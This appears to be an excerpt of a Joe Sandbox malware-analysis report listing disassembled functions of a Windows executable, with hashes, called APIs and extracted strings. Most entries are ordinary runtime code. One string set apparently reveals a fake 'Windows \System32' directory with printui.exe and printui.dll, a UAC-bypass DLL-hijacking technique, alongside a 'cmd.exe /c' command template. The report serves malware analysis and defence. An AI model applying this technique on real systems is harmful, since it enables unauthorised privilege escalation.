                          • Instruction ID: 6530ae92e21a0e8785e7c900dd5740c8ad675238f440485ecef3ad41e6b981c6
                          • Opcode Fuzzy Hash: 8630088bedf43b45efc83e78047511b165fa0e48c8b5310172f303b3592d8840
                          • Instruction Fuzzy Hash: 11024522B1C78646EB24BF25E650379E6D5FB54BC4F044136DE4E93BA5DEBEE8408B00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63a087eea669627eeaa8c4df526416d5ff6df87c0b67d54210a6f718651d713a
                          • Instruction ID: a3c7550a3a8d0fc1af341c527a151bfd55e3c495a05929dff2095a4825d839cd
                          • Opcode Fuzzy Hash: 63a087eea669627eeaa8c4df526416d5ff6df87c0b67d54210a6f718651d713a
                          • Instruction Fuzzy Hash: 37D16DB1F0C65A47DE28AA3BE411AB9A6D4B794BC0F445035EE4ED3BA0DE7DE905C300
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6fd9953bc33474c6735e6af57a768e1f19704400e02921f62bb87ed1167c1393
                          • Instruction ID: 8a2b5f91e3e397ec1a62a5105f6d15ef60594719278461573857899daf4d1e9e
                          • Opcode Fuzzy Hash: 6fd9953bc33474c6735e6af57a768e1f19704400e02921f62bb87ed1167c1393
                          • Instruction Fuzzy Hash: 2CD13A72F0C5560BEB18A92EA581A78E6D5F7D4780F115135DA0AC3BE0EFBAE845C740
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 4003095782-0
                          • Opcode ID: e10e9d0c4bd4698ae2119b11ebc5ed12b49a139d07d8edb5367bd8358ec11802
                          • Instruction ID: 41da470cbc1dc2831f9cbc8538a6aa0930f7ad699985f12b8161d203303acf81
                          • Opcode Fuzzy Hash: e10e9d0c4bd4698ae2119b11ebc5ed12b49a139d07d8edb5367bd8358ec11802
                          • Instruction Fuzzy Hash: 2FC1B566B0C78285EB60BB6195107BAA7E0FB94788F90A035EF8DC7685EE3ED545C700
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 6cb4625e45d58a0910bfd8cdfce76e42e3f73ba13f615c12a1c0a3c670d318e2
                          • Instruction ID: 26a6ef504f9cab8927bc058478b256af383989278426d6a9e7ca1b051352d3fd
                          • Opcode Fuzzy Hash: 6cb4625e45d58a0910bfd8cdfce76e42e3f73ba13f615c12a1c0a3c670d318e2
                          • Instruction Fuzzy Hash: 4EB1DF72A0C68686EB64FFA1C4016B9A3E1FB94B89F404231DA1DD36CBDF3EE5558740
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 909e536e5f028c02a303395f5f4b9b9aa82288cb5e27370e608007b94726d885
                          • Instruction ID: 61c775d357166a8c0d91a90897d32dc421c431c0dad301a2854355d4fa1b850c
                          • Opcode Fuzzy Hash: 909e536e5f028c02a303395f5f4b9b9aa82288cb5e27370e608007b94726d885
                          • Instruction Fuzzy Hash: A4A115A2E1D64286FB24B685C4587B8B7D1FF05BE0F554236CA6D877C2DF6EAC858300
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 4e86ed7b0f11888a8cf23dd40d8c42b1333a2a400f5e338778c74e58754a8851
                          • Instruction ID: 02b2545448d8a35a5870f7479e39f7a0b8055790ae9bd93e6d06cb6670c8a486
                          • Opcode Fuzzy Hash: 4e86ed7b0f11888a8cf23dd40d8c42b1333a2a400f5e338778c74e58754a8851
                          • Instruction Fuzzy Hash: C681A032A1CA1186EB50FE25D48137D63A0FB44B98F906636EF6E87785DF3AD4428340
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 3fad3349443e4352ca4563b4ee5ec969484cc0914d58ee3d7b4fc483fe2e7ef2
                          • Instruction ID: d1fa9f77fc621c00310aa1d31bb5549c29928ad88435889dcc608461819f54c4
                          • Opcode Fuzzy Hash: 3fad3349443e4352ca4563b4ee5ec969484cc0914d58ee3d7b4fc483fe2e7ef2
                          • Instruction Fuzzy Hash: 5761A622E1C79246FB68BA6984442F9E6D1BF40763F584235DB5DC6AC6DF6FE8008B00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: ErrorFreeHeapLast
                          • String ID:
                          • API String ID: 485612231-0
                          • Opcode ID: a26e0b7e733c20988fe20099792aab32ae393d089d120619116f29894ba203d9
                          • Instruction ID: 526c80e6f7b3c7bc8dbaaaba446c0aea842043bef0c42ced6a17694b5087df56
                          • Opcode Fuzzy Hash: a26e0b7e733c20988fe20099792aab32ae393d089d120619116f29894ba203d9
                          • Instruction Fuzzy Hash: C141E562B2CA5581EF44EF2AD954169B3E1B748FC0B59A032DE0DC7B58EE7EC4428300
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d478a4e633571b100eff9937f2f319f24f786d33950d94471d75dc4775c8fb78
                          • Instruction ID: 7174b50f9b739396638ae0b0088a3ac25849459ffbd89a31a63de269dd539783
                          • Opcode Fuzzy Hash: d478a4e633571b100eff9937f2f319f24f786d33950d94471d75dc4775c8fb78
                          • Instruction Fuzzy Hash: 731182B1B1C28386F7A9BB28D451339B7E0BB44386F508039C88DC6691DE7F90909F00
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4c5d79c6fb8e57b0788135a22f2493030c6b79ed2c5f3866b13dce419ad53cb2
                          • Instruction ID: 1328370ac41996b623a801a3a3742ff1268c92b0f5fc3f9f73eaaad72ddc4ca9
                          • Opcode Fuzzy Hash: 4c5d79c6fb8e57b0788135a22f2493030c6b79ed2c5f3866b13dce419ad53cb2
                          • Instruction Fuzzy Hash: C3A00261A0DC17D0E785BF41E8A4034A7B4FB60315B400131D00DC14A29F3FE448C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: DirectorySystem
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set$mkdir "\\?\{}Windows \System32"${}Windows \System32${}Windows \System32\printui.dll${}Windows \System32\printui.exe${}Windows\System32\printui.exe
                          • API String ID: 2188284642-3176087396
                          • Opcode ID: 98b50da478baaa1de672331d57bb35c1ec3c883be076bdde22644114fde739cf
                          • Instruction ID: 2a618bd0c3765c403efcc3002e46297dc24174857e9af96a8d3b370b810929cf
                          • Opcode Fuzzy Hash: 98b50da478baaa1de672331d57bb35c1ec3c883be076bdde22644114fde739cf
                          • Instruction Fuzzy Hash: 33F1193252CBC695E661AB14F4803EAF3A0FBD8344F505126EBCD92A59EF7DD184CB50
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Missing '}' in format string.$Number is too big$Unknown format specifier.
                          • API String ID: 909987262-3302395901
                          • Opcode ID: f852bf43495b18fcd690be9e3e28f9d983a114facf201d046bf2690be2c80a98
                          • Instruction ID: fbe5247983a96eb794997848c01b09321318f7f044650f1a9b49ab950d7745d9
                          • Opcode Fuzzy Hash: f852bf43495b18fcd690be9e3e28f9d983a114facf201d046bf2690be2c80a98
                          • Instruction Fuzzy Hash: 02918D32A0CA4685EB10BF75D4502BCB3B1FB84B88F544232DA0D93699EFBEE559C340
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: Handle$Close$File$ErrorLast$CopyCreate$Information
                          • String ID:
                          • API String ID: 1679173910-0
                          • Opcode ID: cdc2370f03e498abcb4d903f02943b37053576bc7416c231958bfc27685e064e
                          • Instruction ID: c9c3e66688bdba9477d83bda997b551a4f864aee477c1f7786761fc6994f70a3
                          • Opcode Fuzzy Hash: cdc2370f03e498abcb4d903f02943b37053576bc7416c231958bfc27685e064e
                          • Instruction Fuzzy Hash: F9816161F0C65289F7A0BBB594402BEA7E5BB047A8F040B35CE6D97AD9DF3AD506C340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~__invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFacet_RegisterXinvalid_argument
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 3363080787-1689078516
                          • Opcode ID: 33d60e48c9cc2b1c7334e3df05d72950c53ea0b52d52df320c4881f80e9dcc3c
                          • Instruction ID: ee94f54dd32c0cf393a57da76dae798da08934651ed32bf067941dd4b0c75d03
                          • Opcode Fuzzy Hash: 33d60e48c9cc2b1c7334e3df05d72950c53ea0b52d52df320c4881f80e9dcc3c
                          • Instruction Fuzzy Hash: 3A029432A1CB8185EB11FBA9D4402BDB7E0FB44794F944236EA9D87A99EF3DD485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big$Precision not allowed for this argument type.
                          • API String ID: 909987262-435359029
                          • Opcode ID: 655d5505bb36caab243fe4db9d9417e084068b7e30e5faad357a348e62d825d5
                          • Instruction ID: f9d482c8161e6f572ed8008a3a928a1bf3c401e32ebd9962575924c8b8424e5b
                          • Opcode Fuzzy Hash: 655d5505bb36caab243fe4db9d9417e084068b7e30e5faad357a348e62d825d5
                          • Instruction Fuzzy Hash: 9341D132A0C9868AEA25FB28D4502B9A3E0FF51744F944132D75DC36E6EF2FE595C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          Similarity
                          • API ID: Handle$File$ErrorInformationLast$Close__std_fs_open_handle$CreateFeaturePresentProcessor
                          • String ID:
                          • API String ID: 2221425841-0
                          • Opcode ID: be13dedac457fed96a1976cc7ff97a3659dff4da51673047d79026a1ca7cdedc
                          • Instruction ID: 56e2c22107d4ea747527557cb45aaf8811d2cf74770d9fe0c5cb3e74f0aaa043
                          • Opcode Fuzzy Hash: be13dedac457fed96a1976cc7ff97a3659dff4da51673047d79026a1ca7cdedc
                          • Instruction Fuzzy Hash: 7E515021F0C692C9F720BBF698541FD6BE1BB457A8F180235CE2ED6AD5DF2AE4458700
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_copy__std_exception_destroy__std_fs_code_page
                          • String ID: ", "$: "
                          • API String ID: 4080386414-747220369
                          • Opcode ID: 05c3dfbba4eb20530540709d86ff3074b5dc9a95fb648d62f5b8df6b1e23a1b9
                          • Instruction ID: 7a5ca4b24493dc15c985c6465d94af922349250ecf5143f2bcdae2e5000669d2
                          • Opcode Fuzzy Hash: 05c3dfbba4eb20530540709d86ff3074b5dc9a95fb648d62f5b8df6b1e23a1b9
                          • Instruction Fuzzy Hash: 93E18C72B1DB8185EB00FF69D1443ADA3A1FB44BC8F508032DA4D57A9ADFBAD495C380
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Can not switch from automatic to manual indexing$Can not switch from manual to automatic indexing$Invalid format string.$Number is too big
                          • API String ID: 909987262-180087107
                          • Opcode ID: 4c3e943ee338831783309dd563fbb4d97c46b2b84faac3d06deaee2935f2af1c
                          • Instruction ID: 8709228f60fae0bd2da0ea2ded7857c9a50472b1cd7d3833e2f43ff7d8d285cb
                          • Opcode Fuzzy Hash: 4c3e943ee338831783309dd563fbb4d97c46b2b84faac3d06deaee2935f2af1c
                          • Instruction Fuzzy Hash: 52518222A0C55682DF25BF58E0512BDB3E0FF50B84FA44132EB5D866D5EF2EE585C740
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                          • API String ID: 667068680-1247241052
                          • Opcode ID: 22a4611cc918a9d534043bcd573fae71c2f1a40576616ef3d12a778fa7794f91
                          • Instruction ID: 666aef6b016e319b07a6175284e7d358221e9b3ab10544f7bc45e4234d92fb44
                          • Opcode Fuzzy Hash: 22a4611cc918a9d534043bcd573fae71c2f1a40576616ef3d12a778fa7794f91
                          • Instruction Fuzzy Hash: C0F07464A1EB07D5EA14BBA1B8680A1A3E4BF48B5AB844035C90E86321FF7EA159C340
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 849930591-393685449
                          • Opcode ID: 092c79a0d9bcacff9565d77ad08bd040531453131bf8b4731f570bb9007e49b0
                          • Instruction ID: bf8102a9e68aa271963e9bfbf02ef1487b9236546ad44af0e0af63da456da2f5
                          • Opcode Fuzzy Hash: 092c79a0d9bcacff9565d77ad08bd040531453131bf8b4731f570bb9007e49b0
                          • Instruction Fuzzy Hash: A1D17F72A0C74186EB60FBA5D4503ADB7E0FB55B98F10013AEA8D97B99DF39E090C744
                          Similarity
                          • API ID: std::_$Lockit$Concurrency::cancel_current_taskLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name$false$true
                          • API String ID: 3230409043-1062449267
                          • Opcode ID: 9fabb503fc1107b3eab03e6cd44713a08fb1cc94f3790c058f9689e501c1b5d4
                          • Instruction ID: 03477e2f49d08cd61218fdaf2a695aad273e71ff4108870a7c0b15f67429fc31
                          • Opcode Fuzzy Hash: 9fabb503fc1107b3eab03e6cd44713a08fb1cc94f3790c058f9689e501c1b5d4
                          • Instruction Fuzzy Hash: 6F814A22A1DB8185EB01EFA4E4802ADB7F0FF84784F541135EB8DA7A99DF39D590C750
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: f$p$p
                          • API String ID: 3215553584-1995029353
                          • Opcode ID: 1fa6fcf4c69cf2957793d2dab1b9a7211fd6f3d91b307342b650d52c4b68a3d1
                          • Instruction ID: 5080d26fb84d3655c633ec3e59087961c68a09f7cb4f354c2db09bcb46f83ba0
                          • Opcode Fuzzy Hash: 1fa6fcf4c69cf2957793d2dab1b9a7211fd6f3d91b307342b650d52c4b68a3d1
                          • Instruction Fuzzy Hash: 0B12A161F2C193C6FB207B14E058279E7E2FB81754FD4A135E789866D4DE3EE8908B12
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: 7dbb31f6801050b09f23af542c6ce5680b1b033fa1b6e520660a9cb4d4b647be
                          • Instruction ID: 263835e7c161dbcd11adf52b81e194d95fba71007efe1148eb4d278944bb3b8d
                          • Opcode Fuzzy Hash: 7dbb31f6801050b09f23af542c6ce5680b1b033fa1b6e520660a9cb4d4b647be
                          • Instruction Fuzzy Hash: 15C1D222E0C78785E760BB1890442BDBBE1FF81B80F952131DB4E87796DE7EE8659740
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Invalid fill (too long).$Invalid format string.$invalid fill character '{'
                          • API String ID: 909987262-2189586557
                          • Opcode ID: b5ef4e00f5ed7918e6555e22bdf8501b8cab8dfcd7f8afc20cc6f89b8efb41a0
                          • Instruction ID: 132dfa4a2888186fc84d76e2e65263889b578cf7ca034713187737c7d0d15550
                          • Opcode Fuzzy Hash: b5ef4e00f5ed7918e6555e22bdf8501b8cab8dfcd7f8afc20cc6f89b8efb41a0
                          • Instruction Fuzzy Hash: 2A41FB22F0C99682EA64BF99D4501B9E3D1FF51BC8F584032EB4C97799DE6EE5458300
                          Similarity
                          • API ID: Lockitstd::_$CloseHandleLockit::_Lockit::~_$CreateObjectProcessSingleWait_invalid_parameter_noinfo_noreturn
                          • String ID: cmd.exe /c {}
                          • API String ID: 2529529778-3162138867
                          • Opcode ID: 89795bf87a76dcca8fec0eae3f411fff3c49443297445b2a0407c85bee09c839
                          • Instruction ID: c1ec0590a11a587730ed6468783571f5bbba2511c59217f0ba8dfef563ddfabe
                          • Opcode Fuzzy Hash: 89795bf87a76dcca8fec0eae3f411fff3c49443297445b2a0407c85bee09c839
                          • Instruction Fuzzy Hash: 9C517272E1CB818AE710AF74E8403ADB3B1F798758F105225EE8C56A59EFB9D194C700
                          APIs
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E601D1
                          • GetLastError.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E601DF
                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60209
                          • FreeLibrary.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60277
                          • GetProcAddress.KERNEL32(?,?,?,00007FF646E60353,?,?,00000000,00007FF646E5CE5A,?,?,?,00007FF646E5CA91), ref: 00007FF646E60283
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          • API String ID: 2559590344-2084034818
                          • Opcode ID: a8f065913e62d8b40ec08f6ec93b373e41dc6187d27607b4b9745cbf9b314f32
                          • Instruction ID: f6256bc881c99704feec2ba28c6f84764b246b2660693b4d61e9acfed0171596
                          • Opcode Fuzzy Hash: a8f065913e62d8b40ec08f6ec93b373e41dc6187d27607b4b9745cbf9b314f32
                          • Instruction Fuzzy Hash: 37310421B1EB52D1EE22BB12A900275A3D4FF49BA4F891534DE1D8B392FF3EE4458700
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          • API String ID: 3230265001-3130406586
                          • Opcode ID: 89a71625859c9bbcda66b2291a7366cba158d72fa4787ad431cd94ad3bec0ea6
                          • Instruction ID: f310f14e9c16f5d22c33ba78c4e5aaa66c29d00aa1499703b70d8f786a7b358a
                          • Opcode Fuzzy Hash: 89a71625859c9bbcda66b2291a7366cba158d72fa4787ad431cd94ad3bec0ea6
                          • Instruction Fuzzy Hash: C1115E31B1CA4186E760BB52E844329A3E0FB88BE5F144334EA5EC77A5DF7DD4058B44
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          • Opcode ID: 2f010e8b8aea278891a9880bfc7065d316f81339279a43416f5160c67bd53451
                          • Instruction ID: ab67da59fcf78f379b684cd1eb3ba377cb592f6909e4bf031deb6dc5eb946a17
                          • Opcode Fuzzy Hash: 2f010e8b8aea278891a9880bfc7065d316f81339279a43416f5160c67bd53451
                          • Instruction Fuzzy Hash: FD81AC72A0D78286EB20BF69A544279B3E5FB44BE8F540231EA5D83BD9DF3ED4058700
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: 3a9136b57777e7af426870d4492c59b4fdea9b8c37fa80b5f5c531d690ce3055
                          • Instruction ID: 2ae57f67f45b66b3d1b54e0ae9963ed6ff0a2a980011c98a1e283a09d4cbca81
                          • Opcode Fuzzy Hash: 3a9136b57777e7af426870d4492c59b4fdea9b8c37fa80b5f5c531d690ce3055
                          • Instruction Fuzzy Hash: 6A313E22A0CA4285EA24BF25E8401B9B3F0FF98B98F581531DA9D877A5DE7EE441C700
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                          • String ID:
                          • API String ID: 2081738530-0
                          • Opcode ID: ccee4ecad965195149a33127be7459d68f658a740a62c8ff56008f5e199151f1
                          • Instruction ID: 4055c11fe29571029dd5f107048b767a3a7771246e7c01e5bb4b378b82037d3d
                          • Opcode Fuzzy Hash: ccee4ecad965195149a33127be7459d68f658a740a62c8ff56008f5e199151f1
                          • Instruction Fuzzy Hash: 66316122A0CA4285EB54FF25E4401B9B7F0FB98B94F181131EB4D9B3A5DE7EE441C700
                          Similarity
                          • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          • API String ID: 3523768491-393685449
                          • Opcode ID: 0daa2566d35f1be2a9c28eb925f1bb7541095db64908311033f8d271ab9c7a6d
                          • Instruction ID: 53f6d48643733b40051f2e2d0038929a4501629925dfad8b131747d05ad521eb
                          • Opcode Fuzzy Hash: 0daa2566d35f1be2a9c28eb925f1bb7541095db64908311033f8d271ab9c7a6d
                          • Instruction Fuzzy Hash: 9FE1B47290C7828AE720FFA5D4802BDBBE0FB44B48F150136DA5D87696DF39E585CB41
                          APIs
                          • GetLastError.KERNEL32 ref: 00007FF646E6726F
                          • SetLastError.KERNEL32 ref: 00007FF646E6728E
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672B7
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672C8
                          • FlsSetValue.KERNEL32 ref: 00007FF646E672D9
                            • Part of subcall function 00007FF646E68670: HeapFree.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68686
                            • Part of subcall function 00007FF646E68670: GetLastError.KERNEL32(?,?,00007FF646E65F93,00007FF646E6F34A,?,?,?,00007FF646E6F6C7,?,?,00000000,00007FF646E6FC41,?,?,?,00007FF646E6FB73), ref: 00007FF646E68690
                          • SetLastError.KERNEL32 ref: 00007FF646E672FC
                          Similarity
                          • API ID: ErrorLast$Value$FreeHeap
                          • String ID:
                          • API String ID: 365477584-0
                          • Opcode ID: fe2524d419249443a627d0978d975f38a3c012d14499332c4c9054e06e9d0a3a
                          • Instruction ID: 6c927ad051c3709939d19376721e388a2f22d7398c7e9706e5e2140c977a062f
                          • Opcode Fuzzy Hash: fe2524d419249443a627d0978d975f38a3c012d14499332c4c9054e06e9d0a3a
                          • Instruction Fuzzy Hash: AE115E20F1C65382FB547B31A81117EA6D2BF89790F946634EA1EC72D6DF2EEC428354
                          Similarity
                          • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                          • String ID: bad locale name
                          • API String ID: 2967684691-1405518554
                          • Opcode ID: 3c7442846abff8c8df307d68f8679435e50f571c47f0fd70ca014f12eac927a6
                          • Instruction ID: 4532dbb4eec0ea492c864db2a335e8aefa529421083dd451525c11365b3a1ac2
                          • Opcode Fuzzy Hash: 3c7442846abff8c8df307d68f8679435e50f571c47f0fd70ca014f12eac927a6
                          • Instruction Fuzzy Hash: E1413726B0EB4189EB11FBB4D4902FDA3E4BF44788F044435DE4DA6A96DF3AE516D340
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 737ea793ec26d43c82dfac2ff29e7e99fb75e554c7b517a948dd59aa9a8f7307
                          • Instruction ID: 08ddea745b7c6e8040d730b9fc2f6373714f80c5933428c2bd5b0d1fc12e3d5c
                          • Opcode Fuzzy Hash: 737ea793ec26d43c82dfac2ff29e7e99fb75e554c7b517a948dd59aa9a8f7307
                          • Instruction Fuzzy Hash: CEF06D21B0C702C1FB24BB24E84937AA3A0BF8576AF945735C66EC61E9DF2ED049C600
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 3175b5cd3c99ae02cc210337352930788fcf5b6860efe828d43d11b76a3d9a07
                          • Instruction ID: c7a355c5436ca30d1b623e1a944c3d5c63d0f2d5808154cc3a0df6fce01a6f94
                          • Opcode Fuzzy Hash: 3175b5cd3c99ae02cc210337352930788fcf5b6860efe828d43d11b76a3d9a07
                          • Instruction Fuzzy Hash: 94B1AE62A0EB4681FA65BF919584279E7D0FF44B84F098437DE4D87799DE3EE482C308
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                          • String ID: integral cannot be stored in wchar_t
                          • API String ID: 4097890229-1689078516
                          • Opcode ID: 15998b583fd95bf7981427bc455597ab7499049441e43a247a1db67d2f6a571d
                          • Instruction ID: f72d2b41db491b6728c6013ed39a59327dbdc0ed6ab591df15c68045e65c9b9f
                          • Opcode Fuzzy Hash: 15998b583fd95bf7981427bc455597ab7499049441e43a247a1db67d2f6a571d
                          • Instruction Fuzzy Hash: 96E1B432A1CB9185EB10ABA8D4403FCB7F1FB44798F904236DA9D97A99EF39D485C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmp
